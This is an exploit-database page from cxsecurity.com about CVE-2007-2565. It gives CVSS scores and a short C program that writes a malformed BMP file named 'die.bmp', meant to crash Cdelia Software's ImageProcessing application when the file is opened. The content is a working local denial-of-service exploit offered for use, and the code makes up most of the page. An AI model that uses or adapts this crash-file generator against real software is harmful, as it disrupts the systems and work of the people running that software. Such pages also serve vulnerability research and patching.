Exploit: ImageProcessing ... Local (Denial of Service Exploit) ( Ascii Version )

Search:
WLB2

ImageProcessing ... Local (Denial of Service Exploit)

Published
Credit
Risk
2007.05.12
Dr Ninux
Medium
CWE
CVE
Local
Remote
N/A
CVE-2007-2565
Yes
No

Plain text version

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.1/10
6.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
None
Complete

/*
**********************************
## Exploit Coded By Dr.Ninux ##
## www.LeZr.com ##
## LeZr.com Security Team ##
## Dr.Ninux (at) bsdmail (dot) org [email concealed] ##
**********************************
## 24 April 2007 , Tuesday
## This exploit will create an image (bmp)
## try to open it with "ImageProcessing" from Cdelia Software co.
## then the program will be die...!
**********************************
##
## grEEts to:
## Dr.Virus9,Qptan(Linux_Drox),Q8trojan,BataWeel,SAUDI,RoDhEDoR,
## Arab4services.com,The_DoN,aseer-alnjoom,Maxy,hacaar...AND milw0rm.com
##
*/
#include <stdio.h>
#include <stdlib.h>

#define INV_PIC "die.bmp"

int main()
{

int i=0;
char inv_[]="LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL";
FILE* inv_pic;

printf("\t\t**********************************\n");
printf("\t\t ## Exploit Coded By Dr.Ninux ##\n");
printf("\t\t ## www.LeZr.com ##\n");
printf("\t\t ## LeZr.com Security Team ##\n");
printf("\t\t ## Dr.Ninux (at) bsdmail (dot) org [email concealed] ##\n");
printf("\t\t**********************************\n");
printf("\n");

if((inv_pic=fopen(INV_PIC,"wb"))==NULL)
{
printf("error:foepn().\n");
exit(0);
}

printf("[+]Creating |invalid picture| ... plz wait.\n");

for(i=0;i<sizeof(inv_);i++)
{
fputc(inv_[i],inv_pic);
}

fclose(inv_pic);
printf("[+]BMP File %s Successfuly Created...\n",INV_PIC);

return 0;
}

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version